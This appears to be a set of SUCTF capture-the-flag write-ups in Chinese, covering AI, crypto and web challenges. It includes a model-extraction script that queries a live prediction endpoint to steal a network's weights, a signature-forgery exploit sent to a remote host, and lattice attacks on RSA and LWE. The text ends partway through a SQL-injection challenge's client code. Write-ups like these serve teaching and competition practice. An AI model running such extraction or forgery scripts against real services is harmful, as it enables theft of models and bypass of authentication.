AI

SU_babyAI

It seems like something is missing.

import torch
import torch.nn as nn
import random

FLAG = b"SUCTF{fake_flag_xxx}"
q = 1000000007
n = len(FLAG)
m = 15

class ModuloNet(nn.Module):
def __init__(self, n_in, m_out):
super().__init__()

self.conv = nn.Conv1d(1, 1, 3, stride=2, bias=False)
conv_out_size = (n_in - 3) // 2 + 1

self.fc = nn.Linear(conv_out_size, m_out, bias=False)

def generate_task():
model = ModuloNet(n, m)

with torch.no_grad():
model.conv.weight.copy_(torch.randint(0, q, model.conv.weight.shape, dtype=torch.float32))
model.fc.weight.copy_(torch.randint(0, q, model.fc.weight.shape, dtype=torch.float32))

torch.save(model.state_dict(), "model.pth")

w_conv = model.conv.weight.squeeze().long().tolist()
w_fc = model.fc.weight.long().tolist()

x_data = list(FLAG)

conv_out = []
for i in range((n - 3) // 2 + 1):
window = x_data[i*2 : i*2+3]
val = sum(w * x for w, x in zip(w_conv, window))
conv_out.append(val)

Y = []
for i in range(m):
val = sum(w * x for w, x in zip(w_fc[i], conv_out))
noise = random.randint(-160, 160)
Y.append((val + noise) % q)

print(f"n = {n}")
print(f"m = {m}")
print(f"q = {q}")
print(f"Y = {Y}")

if __name__ == "__main__":
generate_task()

'''
n = 41
m = 15
q = 1000000007
Y = [776038603, 454677179, 277026269, 279042526, 78728856, 784454706, 29243312, 291698200, 137468500, 236943731, 733036662, 421311403, 340527174, 804823668, 379367062]
'''

在深度学习中,如果没有类似 ReLU、Sigmoid 这样的非线性激活函数,无论叠加多少层卷积层 (Conv1d) 或全连接层 (Linear),并且 bias=False,其正向传播的本质都可以完全坍缩、折叠成一次普通的矩阵乘法。我们可以将这两层网络等效为一个二维系数矩阵 M15×41M_{15 \times 41}

对于输入列向量 XX(即 Flag 的 ASCII 码),网络的前向传播等价于:$$ Output = M \times X $$

观察源码最后的输出处理:

Pythonnoise = random.randint(-160, 160)
Y.append((val + noise) % q)

每次输出都加上了 [160,160][-160, 160] 范围的小噪音,并对大素数 q=1000000007q = 1000000007 取模,得到最终的数组 Y15Y_{15},也就是 LWE

YM×X+E(modq)Y \equiv M \times X + E \pmod q

MM 是我们通过网络权重推导出的 15×4115 \times 41 等效系数矩阵
XX 是 41 个字符的 FLAG。已知 SUCTF{},实际未知数为 34 个。
EE 是范围在 [160,160][-160, 160] 之间的噪音向量

剔除噪音 EE,需要利用 Kannan 嵌入法 (Kannan's Embedding) 将 LWE 转化为最近向量问题 (CVP) 构建晶格,并通过 LLL 算法 寻找最短向量(SVP)

为了确保 LLL 算法 100% 收敛找到最短向量,必须运用两个关键的格优化技巧:
中心平移 (Center Shift):将未知数 XX[32,126][32, 126] 平移到 [47,47][-47, 47](减去 ASCII 中心值 79),极大降低目标向量的范数

方差配平 (Weight Balancing):平移后的未知数最大约 47,而噪音最大为 160。我们在对角矩阵中将未知数权重放大 3 倍(3×471413 \times 47 \approx 141),使其在格中的地位(方差)与噪音相近。

提取网络权重:

import torch
import torch.nn as nn
import json

class ModuloNet(nn.Module):
def __init__(self, n_in, m_out):
super().__init__()
self.conv = nn.Conv1d(1, 1, 3, stride=2, bias=False)
self.fc = nn.Linear((n_in - 3) // 2 + 1, m_out, bias=False)

model = ModuloNet(41, 15)
model.load_state_dict(torch.load("model.pth", map_location="cpu"))

with open("weights.json", "w") as f:
json.dump({"w_conv": model.conv.weight.squeeze().long().tolist(),
"w_fc": model.fc.weight.long().tolist()}, f)
print("[+] 权重已成功导出至 weights.json")
# sage
import json
from sage.all import matrix, ZZ

with open("weights.json", "r") as f:
data = json.load(f)
w_conv, w_fc = data["w_conv"], data["w_fc"]

n, m, q = 41, 15, 1000000007
Y = [776038603, 454677179, 277026269, 279042526, 78728856, 784454706, 29243312,
291698200, 137468500, 236943731, 733036662, 421311403, 340527174, 804823668, 379367062]

# 1. 拍平神经网络为 M[15][41] 矩阵
M = [[0] * n for _ in range(m)]
for i in range(m):
for j in range((n - 3) // 2 + 1):
coef = w_fc[i][j]
M[i][j*2] = (M[i][j*2] + coef * w_conv[0]) % q
M[i][j*2+1] = (M[i][j*2+1] + coef * w_conv[1]) % q
M[i][j*2+2] = (M[i][j*2+2] + coef * w_conv[2]) % q

# 2. 已知位预处理与中心平移
prefix, suffix = b"SUCTF{", b"}"
known_idx = list(range(len(prefix))) + [n - 1]
unk_idx = [i for i in range(n) if i not in known_idx]
U = len(unk_idx)

flag_known = [0] * n
for k in range(len(prefix)): flag_known[k] = prefix[k]
flag_known[-1] = suffix[0]

SHIFT = 79 # ASCII范围中心

target = [0] * m
for i in range(m):
known_sum = sum(M[i][k] * flag_known[k] for k in known_idx)
shift_sum = sum(M[i][k] * SHIFT for k in unk_idx)
target[i] = (Y[i] - known_sum - shift_sum) % q

# 3. Kannan Embedding 构建格
W_x = 3 # 未知数放大倍率 (3 * 47 ≈ 141)
W_t = 160 # 目标常数标识量级 (匹配噪音上限 160)
dim = U + m + 1
B = matrix(ZZ, dim, dim)

for i in range(U):
B[i, i] = W_x
for j in range(m): B[i, U + j] = M[j][unk_idx[i]]
for j in range(m): B[U + j, U + j] = q
for j in range(m): B[-1, U + j] = -target[j]
B[-1, -1] = W_t

# 4. LLL 约化提取最短向量
print("[*] 正在执行 LLL 格基约化...")
B_red = B.LLL()

for row in B_red:
if abs(row[-1]) == W_t:
sign = 1 if row[-1] == W_t else -1
try:
flag_chars = []
for i in range(U):
val = row[i] * sign
assert val % W_x == 0
x_real = (val // W_x) + SHIFT
assert 32 <= x_real <= 126
flag_chars.append(chr(x_real))
print("\n[🎉] 完美剥离噪音,成功解出 FLAG: ")
print("SUCTF{" + "".join(flag_chars) + "}")
break
except AssertionError:
continue
else:
print("[-] 未能找到符合条件的短向量。")
# SUCTF{PyT0rch_m0del_c4n_h1d3_LWE_pr0bl3m}

SU_theif

老师布置了一道课后作业,小S很早就写完了并且部署好了,小U很懒惰,不想写想直接抄小S的,但是小S不让,所以请你帮帮他,注意了这件事情不合规所以不要和任何人说

from flask import Flask, request, jsonify, render_template
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torch.utils.data import DataLoader, Subset, Dataset
import base64
import io
import numpy as np
import os
app = Flask(__name__)

class Net(nn.Module):

def __init__(self):
super(Net, self).__init__()
self.linear = nn.Linear(256, 256)
self.conv=nn.Conv2d(1, 1, (3, 3), stride=1)

self.conv1=nn.Conv2d(1, 1, (2, 2), stride=2)

def forward(self, x):
x = nn.functional.pad(x, (2, 0, 2, 0), mode='constant', value=0)
x = self.conv(x)
x = self.conv1(x)
x = x.view(-1)
x = self.linear(x)
return x

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = Net().to(device)
model.load_state_dict(torch.load('/app/model.pth', weights_only=True, map_location=device))

user_model = Net().to(device)

@app.route('/')
def index():
return render_template('index.html')

@app.route('/predict', methods=['POST'])
def predict():
if 'image' not in request.json:
return jsonify({'error': '没有提供图像'}), 400

try:
image_data = request.json['image']
tensor_back = torch.tensor(image_data).to(device)

with torch.no_grad():
outputs = model(tensor_back)

return jsonify({'prediction': outputs.tolist()})

except Exception as e:
return jsonify({'error': str(e)}), 500

@app.route('/flag', methods=['POST'])
def flag():
if 'model' not in request.json:
return jsonify({'error': '没有提供模型文件'}), 400

try:
model_data = base64.b64decode(request.json['model'])
model_file = io.BytesIO(model_data)
user_model.load_state_dict(torch.load(model_file, weights_only=True, map_location=device))

threshold_weight = 0.0005
threshold_bias = 0.005


for i, (param, user_param) in enumerate(zip(model.parameters(), user_model.parameters())):


if param.dim() == 2:
if torch.any(~(abs(param - user_param) <= threshold_weight)):
return jsonify({'error': f'Layer weight difference too large at layer {i}'}), 400
elif param.dim() == 1:
if torch.any(~(abs(param - user_param) <= threshold_bias)):
return jsonify({'error': f'Layer bias difference too large at layer {i}'}), 400

with open('/app/flag', 'r') as f:
flag = f.read()
return jsonify({'flag': f'Here is your flag: {flag}'})

except Exception as e:
return jsonify({'error': str(e)}), 500

if __name__ == '__main__':
app.run(host="0.0.0.0", port=8080)

关键漏洞在:

  • 服务端只校验了 2 维参数和 1 维参数(也就是 linear.weight 和各 bias)
  • 4 维卷积权重完全没有被检查(conv.weight、conv1.weight)

直接提交 model_base.pth 会失败,报第 0 层(linear.weight)差异过大。所以正确做法是:

  1. 保留 base 模型的卷积层
  2. 调用 /predict 收集随机输入 x 与输出 y
  3. 用 base 卷积层把 x 映射成特征 z
  4. 通过最小二乘一次性解出线性层参数:y ≈ Wz + b
  5. 把求得的 W、b 写回模型后提交 /flag
import argparse
import base64
import io
import time

import requests
import torch
import torch.nn as nn


class Net(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(256, 256)
self.conv = nn.Conv2d(1, 1, (3, 3), stride=1)
self.conv1 = nn.Conv2d(1, 1, (2, 2), stride=2)

def forward(self, x):
x = nn.functional.pad(x, (2, 0, 2, 0), mode="constant", value=0)
x = self.conv(x)
x = self.conv1(x)
x = x.view(-1)
x = self.linear(x)
return x


def query_predict(session, base_url, x, retries=8, initial_wait=0.2):
payload = {"image": x.tolist()}
wait = initial_wait

for _ in range(retries):
try:
response = session.post(
base_url + "/predict", json=payload, timeout=20)
if response.status_code == 200:
data = response.json()
if "prediction" in data:
return torch.tensor(data["prediction"], dtype=torch.float32)
except requests.RequestException:
pass

time.sleep(wait)
wait *= 1.5

return None


def submit_model(session, base_url, model):
model_buffer = io.BytesIO()
torch.save(model.state_dict(), model_buffer)
model_b64 = base64.b64encode(model_buffer.getvalue()).decode()

response = session.post(
base_url + "/flag", json={"model": model_b64}, timeout=30)
return response.status_code, response.text


def main():
parser = argparse.ArgumentParser(description="SU_theif solver")
parser.add_argument(
"--url", default="http://1.95.113.59:10003", help="Challenge base URL")
parser.add_argument("--samples", type=int, default=700,
help="Number of queries for least squares")
parser.add_argument("--seed", type=int, default=0, help="Random seed")
args = parser.parse_args()

torch.manual_seed(args.seed)

model = Net()
base_state = torch.load(
"model_base.pth", map_location="cpu", weights_only=True)
model.load_state_dict(base_state)

session = requests.Session()

x_rows = []
y_rows = []

print(f"[+] Collecting {args.samples} samples from {args.url}")
attempts = 0
max_attempts = args.samples * 20

while len(x_rows) < args.samples and attempts < max_attempts:
attempts += 1
x = torch.randn(1, 1, 32, 32)

with torch.no_grad():
z = nn.functional.pad(x, (2, 0, 2, 0), mode="constant", value=0)
z = model.conv(z)
z = model.conv1(z)
z = z.view(-1)

y = query_predict(session, args.url, x)
if y is None:
continue

x_rows.append(torch.cat([z, torch.ones(1)], dim=0))
y_rows.append(y)

if len(x_rows) % 100 == 0:
print(
f" collected: {len(x_rows)}/{args.samples} (attempts={attempts})")

if len(x_rows) < args.samples:
print(
f"[-] Failed to collect enough samples: {len(x_rows)}/{args.samples}")
return

print("[+] Solving linear parameters with least squares")
x_matrix = torch.stack(x_rows) # (N, 257)
y_matrix = torch.stack(y_rows) # (N, 256)

solution = torch.linalg.lstsq(x_matrix, y_matrix).solution # (257, 256)
recovered_w = solution[:256, :].T.contiguous() # (256, 256)
recovered_b = solution[256, :].contiguous() # (256,)

with torch.no_grad():
model.linear.weight.copy_(recovered_w)
model.linear.bias.copy_(recovered_b)

print("[+] Submitting recovered model")
status_code, body = submit_model(session, args.url, model)
print(status_code)
print(body)


if __name__ == "__main__":
main()
# SUCTF{n0t_4ll_h1st0ry_t3lls_th3_truth_6a4e2b8d}

Crypto

SU_RSA

This is an RSA challenge

from Crypto.Util.number import *
flag = b'******'
m = bytes_to_long(flag)
bits = 1024
delta = 0.08
gamma = 0.39
delta0 = 0.33

p = getPrime(bits // 2)
q = getPrime(bits // 2)
N = p * q
d = getPrime(int(bits*delta0))
phi = (p-1)*(q-1)
e = inverse(d,phi)
S = p + q - (p + q) % (2**int(bits * gamma))
c = pow(m,e,N)

print("N =",N)
print("e =",e)
print("c =",c)
print("S =",S)

"""
N = 92365041570462372694496496651667282908316053786471083312533551094859358939662811192309357413068144836081960414672809769129814451275108424713386238306177182140825824252259184919841474891970355752207481543452578432953022195722010812705782306205731767157651271014273754883051030386962308159187190936437331002989
e = 11633089755359155730032854124284730740460545725089199775211869030086463048569466235700655506823303064222805939489197357035944885122664953614035988089509444102297006881388753631007277010431324677648173190960390699105090653811124088765949042560547808833065231166764686483281256406724066581962151811900972309623
c = 49076508879433623834318443639845805924702010367241415781597554940403049101497178045621761451552507006243991929325463399667338925714447188113564536460416310188762062899293650186455723696904179965363708611266517356567118662976228548528309585295570466538477670197066337800061504038617109642090869630694149973251
S = 19240297841264250428793286039359194954582584333143975177275208231751442091402057804865382456405620130960721382582620473853285822817245042321797974264381440
"""

p+q高位泄露

p+q=S+x0p + q = S + x_0
ed=kϕ(N)+1e \cdot d = k \cdot \phi(N) + 1
ϕ(N)=N(p+q)+1=NSx0+1\phi(N) = N - (p+q) + 1 = N - S - x_0 + 1
A=NS+1A = N - S + 1
ed=k(Ax0)+1e \cdot d = k \cdot (A - x_0) + 1
k(Ax0)+10(mode)k \cdot (A - x_0) + 1 \equiv 0 \pmod e
f(k,x0)=k(Ax0)+10(mode)f(k, x_0) = k \cdot (A - x_0) + 1 \equiv 0 \pmod e

k 的大小近似等于 d,直接跑二元 copper 的板子出不来。因为 e 不是素数,所以 Zmod(e) 存在零因子,它不是一个整环,简单修复一下代码

# sage
from sage.all import *
from Crypto.Util.number import *
import itertools

def small_roots(f, bounds, m=1, d=None):
if not d:
d = f.degree()

R = f.base_ring()
N = R.cardinality()

# ================= 修复非整环报错 =================
lm = f.monomials()[0]
lc = f.monomial_coefficient(lm)
inv_lc = inverse(lc, N)
f = f * inv_lc
f = f.change_ring(ZZ)
# ============================================

G = Sequence([], f.parent())
for i in range(m + 1):
base = N ^ (m - i) * f ^ i
for shifts in itertools.product(range(d), repeat=f.nvariables()):
g = base * prod(map(power, f.variables(), shifts))
G.append(g)

B, monomials = G.coefficient_matrix()
monomials = vector(monomials)

factors = [monomial(*bounds) for monomial in monomials]
for i, factor in enumerate(factors):
B.rescale_col(i, factor)

B = B.dense_matrix().LLL()

B = B.change_ring(QQ)
for i, factor in enumerate(factors):
B.rescale_col(i, 1 / factor)

H = Sequence([], f.parent().change_ring(QQ))
for h in filter(None, B * monomials):
H.append(h)
I = H.ideal()
if I.dimension() == -1:
H.pop()
elif I.dimension() == 0:
roots = []
for root in I.variety(ring=ZZ):
root = tuple(R(root[var]) for var in f.variables())
roots.append(root)
return roots

return []

N = 92365041570462372694496496651667282908316053786471083312533551094859358939662811192309357413068144836081960414672809769129814451275108424713386238306177182140825824252259184919841474891970355752207481543452578432953022195722010812705782306205731767157651271014273754883051030386962308159187190936437331002989
e = 11633089755359155730032854124284730740460545725089199775211869030086463048569466235700655506823303064222805939489197357035944885122664953614035988089509444102297006881388753631007277010431324677648173190960390699105090653811124088765949042560547808833065231166764686483281256406724066581962151811900972309623
c = 49076508879433623834318443639845805924702010367241415781597554940403049101497178045621761451552507006243991929325463399667338925714447188113564536460416310188762062899293650186455723696904179965363708611266517356567118662976228548528309585295570466538477670197066337800061504038617109642090869630694149973251
S = 19240297841264250428793286039359194954582584333143975177275208231751442091402057804865382456405620130960721382582620473853285822817245042321797974264381440
A = N - S + 1

PR.<k, x> = PolynomialRing(Zmod(e))
f = k * (A - x) + 1
res = small_roots(f, (2^340, 2^400), m = 3, d = 4)
k = int(root[0])
x = int(root[1])
phi = N - (S + x) + 1
d = inverse(e, phi)
flag = long_to_bytes(pow(c,d,N)).decode()
print(flag)
# SUCTF{congratulation_you_know_small_d_with_hint_factor}

SU_Restaurant

Well, aren’t there a bit too many cryptography challenges here?

from Crypto.Util.number import *
from Crypto.Util.Padding import *
from random import randint, choice, choices
from hashlib import sha3_512
from base64 import b64encode, b64decode
from secret import flag
import numpy as np
import json
import os
# import pty

H = lambda x: [int(y, 16) for y in [sha3_512(x).hexdigest()[i:i+2] for i in range(0, 128, 2)]]
alphabet = "".join([chr(i) for i in range(33, 127)])

class Point:
def __init__(self, x):
if isinstance(x, float):
raise ValueError("...")
while not isinstance(x, int):
x = x.x
self.x = x

def __add__(self, other):
if isinstance(other, int):
return self.x + other
return Point(min(self.x, other.x))

def __radd__(self, other):
if isinstance(other, int):
return self.x + other
return Point(min(self.x, other.x))

def __mul__(self, other):
return Point(self.x + other.x)

def __eq__(self, other):
return self.x == other.x

def __repr__(self):
return f"{self.x}"

def __int__(self):
return self.x


class Block:
def __init__(self, n, m, data=None):
self.n = n
self.m = m
if data and (len(data) != n or len(data[0]) != m):
raise ValueError("...")
if data:
if isinstance(data, Point):
self.data = [[Point(data[i][j].x) for j in range(m)] for i in range(n)]
else:
self.data = [[Point(data[i][j]) for j in range(m)] for i in range(n)]
else:
self.data = [[Point(randint(0, 255)) for _ in range(m)] for _ in range(n)]

def __add__(self, other):
return Block(self.n, self.m, [[self.data[i][j] + other.data[i][j] for j in range(self.m)] for i in range(self.n)])

def __mul__(self, other):
assert self.m == other.n, "😭"
res = [[Point(511) for _ in range(other.m)] for _ in range(self.n)]
for i in range(self.n):
for j in range(other.m):
for k in range(self.m):
res[i][j] = res[i][j] + (self.data[i][k] * other.data[k][j])

return Block(self.n, other.m, res)

def __eq__(self, other):
res = True
for i in range(self.n):
for j in range(self.m):
res = res and self.data[i][j] == other.data[i][j]
return res

def __getitem__(self, item):
return self.data[item]

def __repr__(self):
return f"{self.data}"

def legitimacy(self, lb, rb):
for i in range(self.n):
for j in range(self.m):
if not (lb <= int(self.data[i][j].x) <= rb):
return False
return True

class Restaurant:
def __init__(self, m, n, k):
self.m, self.n, self.k = m, n, k
self.chef = Block(m, k)
self.cooker = Block(k, n)
self.fork = self.chef * self.cooker

def cook(self, msg):
if isinstance(msg, str):
msg = msg.encode()
tmp = H(msg)
M = Block(self.n, self.m, [[tmp[i * self.m + j] for j in range(self.m)] for i in range(self.n)])
while True:
U = Block(self.n, self.k)
V = Block(self.k, self.m)
P = self.chef * V
R = U * self.cooker
S = U * V
A = (M * self.chef) + U
B = (self.cooker * M) + V
if A != U and B != V:
break
return A, B, P, R, S

def eat(self, msg, A, B, P, R, S):
if isinstance(msg, str):
msg = msg.encode()
tmp = H(msg)
M = Block(self.n, self.m, [[tmp[i * self.m + j] for j in range(self.m)] for i in range(self.n)])
Z = (M * self.fork * M) + (M * P) + (R * M) + S
W = A * B
legal = A.legitimacy(0, 256) and B.legitimacy(0, 256) and P.legitimacy(0, 256) and R.legitimacy(0, 256) and S.legitimacy(0, 256)
return W == Z and W != S and legal


banner = """=================================================================
____ _ _ ____ _ _
/ ___|| | | | | _ \ ___ ___| |_ __ _ _ _ _ __ __ _ _ __ | |_
\___ \| | | | | |_) / _ \/ __| __/ _` | | | | '__/ _` | '_ \| __|
___) | |_| | | _ < __/\__ \ || (_| | |_| | | | (_| | | | | |_
|____/ \___/ |_| \_\___||___/\__\__,_|\__,_|_| \__,_|_| |_|\__|
=================================================================
"""

menu = """Do something...
[1] Say to the waiter: "Please give me some food."
[2] Say to the waiter: "Please give me the FLAG!"
[3] Check out
What do you want to do?
>>> """

foodlist = ["Spring rolls", "Red Rice Rolls", "Chencun Rice Noodles", "Egg Tart", "Cha siu bao"]
table = []

def main():
print(banner)
SU_Restaurant = Restaurant(8, 8, 7)

havefork = False
try:
while True:
op = int(input(menu))
if op == 1:
if len(table) == 2:
print("You're full and don't want to order more...")
continue
foodname = choice(foodlist)
while foodname in table:
foodname = choice(foodlist)
print(f'The waiter says: "Here is your {foodname}!"')
table.append(foodname)
A, B, P, R, S = SU_Restaurant.cook(foodname)
print(f'A = {A}\nB = {B}\nP = {P}\nR = {R}\nS = {S}')

elif op == 2:
Fo0dN4mE = "".join(choices(alphabet, k=36))
print(f'The waiter says: "Please make {Fo0dN4mE} for me!"')
res = json.loads(input(">>> "))
r1 = np.linalg.matrix_rank(np.array(res["A"]))
r2 = np.linalg.matrix_rank(np.array(res["B"]))
r3 = np.linalg.matrix_rank(np.array(res["P"]))
r4 = np.linalg.matrix_rank(np.array(res["R"]))
r5 = np.linalg.matrix_rank(np.array(res["S"]))

if r1 < 7 or r2 < 7 or r3 < 8 or r4 < 8 or r5 < 8:
print('The waiter says: "These are illegal food ingredients"')
continue

A = Block(8, 7, res["A"])
B = Block(7, 8, res["B"])
P = Block(8, 8, res["P"])
R = Block(8, 8, res["R"])
S = Block(8, 8, res["S"])
if SU_Restaurant.eat(Fo0dN4mE, A, B, P, R, S):
print(f'The waiter says: "Here is the FLAG: {flag}"')
else:
print('The waiter says: "This is not what I wanted!"')
exit(0)

elif op == 3:
print('The waiter says: "Welcome to our restaurant next time!"')
break
else:
print("Invalid option!")
except:
print("Something wrong...")
exit(0)

if __name__ == "__main__":
main()

题目实现了一个类似于热带半环数字签名的协议,但我们可以通过巧妙构造矩阵,在完全不知道密钥(即代码中的 fork 或 F)的情况下伪造合法的签名

在代码自定义的 Point 和 Block 类中,重载了加法和乘法:
加法 (+):取两个数的最小值 min(x,y)\min(x, y)
乘法 (*):取两个数的一般加法 x+yx + y

在验证逻辑 eat() 中,服务器要求我们提供 A,B,P,R,SA, B, P, R, S 五个矩阵,使得:$$W = A \times B = M \times F \times M + M \times P + R \times M + S = Z$$且满足 WSW \neq S 以及所有矩阵为满秩(常规线性代数意义下的秩)。因为加法是取最小值,上述等式可以转换为标准数学表达:$$Z_{i,j} = \min(MFM_{i,j}, MP_{i,j}, RM_{i,j}, S_{i,j})$$漏洞点:虽然我们不知道 FF,但我们可以通过控制 WW 和其余矩阵,让 ZZ 的最小值完全不依赖于 MFMMFM。由于 MFMi,j=mink,l(Mi,k+Fk,l+Ml,j)MFM_{i,j} = \min_{k,l} (M_{i,k} + F_{k,l} + M_{l,j}),且 F0F \ge 0,因此我们有一个硬性下界:$$MFM_{i,j} \ge \min_k M_{i,k} + \min_l M_{l,j}$$只要我们构造的 Wi,j=minkMi,k+minlMl,jW_{i,j} = \min_k M_{i,k} + \min_l M_{l,j},就能保证 WMFMW \le MFM 永远成立。此时,只要让 MPMPRMRM 等于 WW,就能在不知道 FF 的情况下完美控制 ZZ

MM 的第 ii 行最小值为 R_miniR\_min_i,第 jj 列最小值为 C_minjC\_min_j。我们将目标矩阵设为 Wi,j=R_mini+C_minjW_{i,j} = R\_min_i + C\_min_j

构造 AABB:我们需要 A×B=WA \times B = W,且 A,BA, B 满足常规秩要求(秩为 7)。我们可以利用随机的布尔覆盖矩阵:如果覆盖位为 1,则填入 R_miniR\_min_iC_minjC\_min_j;否则填入较大的随机数(如 200)。这样既能保证热带乘积为 WW,又能保证满秩

构造 SS:为了满足 WSW \neq S 并控制满秩,我们可以让 SS 几乎等于 WW,仅在对角线上加 1:Si,j=Wi,jS_{i,j} = W_{i,j}(当 iji \neq j);Si,i=Wi,i+1S_{i,i} = W_{i,i} + 1

构造 PP:因为对角线上 Si,i>Wi,iS_{i,i} > W_{i,i},我们需要 MPMP 在对角线上提供最小值 Wi,iW_{i,i}。对于每一列 jj,找到 MM 在该行的最小值索引 kjk_j,令 Pkj,j=C_minjP_{k_j, j} = C\_min_j,其余元素填大数(如 200)

构造 RR:用随机大数(如 200~255)填充 RR,使其满秩且在取最小值时不产生影响

from pwn import *
import numpy as np
import json
from hashlib import sha3_512


def H(x):
return [int(y, 16) for y in [sha3_512(x).hexdigest()[i:i+2] for i in range(0, 128, 2)]]

def solve_matrices(foodname):
tmp = H(foodname.encode())
M = np.array(tmp).reshape(8, 8)

# 提取行最小值和列最小值
R_min = np.min(M, axis=1)
C_min = np.min(M, axis=0)

# 构造满秩的 A (8x7) 和 B (7x8),使其热带乘积等于目标矩阵 W
while True:
ZA = np.random.randint(0, 2, (8, 7))
ZB = np.random.randint(0, 2, (7, 8))
if np.all(ZA @ ZB > 0): # 确保热带乘积能完全覆盖
A = np.where(ZA == 1, R_min[:, None], np.random.randint(200, 255, (8, 7)))
B = np.where(ZB == 1, C_min[None, :], np.random.randint(200, 255, (7, 8)))
if np.linalg.matrix_rank(A) == 7 and np.linalg.matrix_rank(B) == 7:
break

# 构造满秩的 P (8x8),使得 MP 的对角线恰好等于 W 的对角线
while True:
P = np.random.randint(200, 255, (8, 8))
for j in range(8):
k_j = np.argmin(M[j, :])
P[k_j, j] = int(C_min[j])
if np.linalg.matrix_rank(P) == 8:
break

# 构造满秩的 R (8x8),使用随机大数
while True:
R = np.random.randint(200, 255, (8, 8))
if np.linalg.matrix_rank(R) == 8:
break

# 构造满秩的 S (8x8),非对角线等于 W,对角线等于 W+1
W = R_min[:, None] + C_min[None, :]
S = W.copy()
np.fill_diagonal(S, np.diag(W) + 1)
while np.linalg.matrix_rank(S) < 8:
np.fill_diagonal(S, np.diag(S) + 1)

payload = {
"A": A.tolist(),
"B": B.tolist(),
"P": P.tolist(),
"R": R.tolist(),
"S": [[int(x) for x in row] for row in S]
}
return json.dumps(payload)


def exploit():
HOST = '101.245.107.149'
PORT = 10020

log.info(f"Connecting to {HOST}:{PORT}...")
io = remote(HOST, PORT)

# 接收菜单并选择选项 2
io.recvuntil(b">>> ")
log.info("Sending option 2 (Please give me the FLAG!)")
io.sendline(b"2")

# 提取服务端生成的 Fo0dN4mE
io.recvuntil(b'The waiter says: "Please make ')
foodname = io.recvuntil(b' for me!"', drop=True).decode()
log.success(f"Intercepted target foodname: {foodname}")

# 计算 Payload
log.info("Calculating tropical matrices...")
payload_json = solve_matrices(foodname)
log.success("Payload generated successfully!")

# 发送 Payload
io.recvuntil(b">>> ")
io.sendline(payload_json.encode())

# 接收并打印最后的结果 (FLAG)
log.info("Waiting for the waiter's response...")
response = io.recvall(timeout=3).decode().strip()

print("\n" + "="*50)
print("SERVER RESPONSE:")
print(response)
print("="*50 + "\n")

if "flag{" in response or "FLAG:" in response:
log.success("Pwned! Check the flag above.")
else:
log.warning("Did not find flag pattern in response. Check the output.")

if __name__ == '__main__':
exploit()
# SUCTF{W3lc0m3_t0_SU_R3stAur4nt_n3Xt_t1me!:-)}

Web

SU_sqli

Zhou discovered a SQL injection vulnerability. Are you able to compromise the target?

(() => {
const _s = [
"L2FwaS9zaWdu",
"L2FwaS9xdWVyeQ==",
"UE9TVA==",
"Y29udGVudC10eXBl",
"YXBwbGljYXRpb24vanNvbg==",
"Y3J5cHRvMS53YXNt",
"Y3J5cHRvMi53YXNt"
];
const _d = (i) => atob(_s[i]);

const $ = (id) => document.getElementById(id);
const out = $("out");
const err = $("err");

let wasmReady;

function b64UrlToBytes(s) {
let t = s.replace(/-/g, "+").replace(/_/g, "/");
while (t.length % 4) t += "=";
const bin = atob(t);
const out = new Uint8Array(bin.length);
for (let i = 0; i < bin.length; i++) out[i] = bin.charCodeAt(i);
return out;
}

function bytesToB64Url(bytes) {
let bin = "";
for (let i = 0; i < bytes.length; i++) bin += String.fromCharCode(bytes[i]);
return btoa(bin).replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
}

function rotl32(x, r) {
return ((x << r) | (x >>> (32 - r))) >>> 0;
}

function rotr32(x, r) {
return ((x >>> r) | (x << (32 - r))) >>> 0;
}

const rotScr = [1, 5, 9, 13, 17, 3, 11, 19];

function maskBytes(nonceB64, ts) {
const nb = b64UrlToBytes(nonceB64);
let s = 0 >>> 0;
for (let i = 0; i < nb.length; i++) {
s = (Math.imul(s, 131) + nb[i]) >>> 0;
}
const hi = Math.floor(ts / 0x100000000);
s = (s ^ (ts >>> 0) ^ (hi >>> 0)) >>> 0;
const out = new Uint8Array(32);
for (let i = 0; i < 32; i++) {
s ^= (s << 13) >>> 0;
s ^= s >>> 17;
s ^= (s << 5) >>> 0;
out[i] = s & 0xff;
}
return out;
}

function unscramble(pre, nonceB64, ts) {
const buf = b64UrlToBytes(pre);
if (buf.length !== 32) throw new Error("prep");
for (let i = 0; i < 8; i++) {
const o = i * 4;
let w =
(buf[o] | (buf[o + 1] << 8) | (buf[o + 2] << 16) | (buf[o + 3] << 24)) >>> 0;
w = rotr32(w, rotScr[i]);
buf[o] = w & 0xff;
buf[o + 1] = (w >>> 8) & 0xff;
buf[o + 2] = (w >>> 16) & 0xff;
buf[o + 3] = (w >>> 24) & 0xff;
}
const mask = maskBytes(nonceB64, ts);
for (let i = 0; i < 32; i++) buf[i] ^= mask[i];
return buf;
}

function probeMask(probe, ts) {
let s = 0 >>> 0;
for (let i = 0; i < probe.length; i++) {
s = (Math.imul(s, 33) + probe.charCodeAt(i)) >>> 0;
}
const hi = Math.floor(ts / 0x100000000);
s = (s ^ (ts >>> 0) ^ (hi >>> 0)) >>> 0;
const out = new Uint8Array(32);
for (let i = 0; i < 32; i++) {
s = (Math.imul(s, 1103515245) + 12345) >>> 0;
out[i] = (s >>> 16) & 0xff;
}
return out;
}

function mixSecret(buf, probe, ts) {
const mask = probeMask(probe, ts);
if (mask[0] & 1) {
for (let i = 0; i < 32; i += 2) {
const t = buf[i];
buf[i] = buf[i + 1];
buf[i + 1] = t;
}
}
if (mask[1] & 2) {
for (let i = 0; i < 8; i++) {
const o = i * 4;
let w =
(buf[o] | (buf[o + 1] << 8) | (buf[o + 2] << 16) | (buf[o + 3] << 24)) >>> 0;
w = rotl32(w, 3);
buf[o] = w & 0xff;
buf[o + 1] = (w >>> 8) & 0xff;
buf[o + 2] = (w >>> 16) & 0xff;
buf[o + 3] = (w >>> 24) & 0xff;
}
}
for (let i = 0; i < 32; i++) buf[i] ^= mask[i];
return buf;
}

async function loadWasm() {
if (wasmReady) return wasmReady;
wasmReady = (async () => {
const go1 = new Go();
const resp1 = await fetch("/static/" + _d(5));
const buf1 = await resp1.arrayBuffer();
const { instance: inst1 } = await WebAssembly.instantiate(buf1, go1.importObject);
go1.run(inst1);

const go2 = new Go();
const resp2 = await fetch("/static/" + _d(6));
const buf2 = await resp2.arrayBuffer();
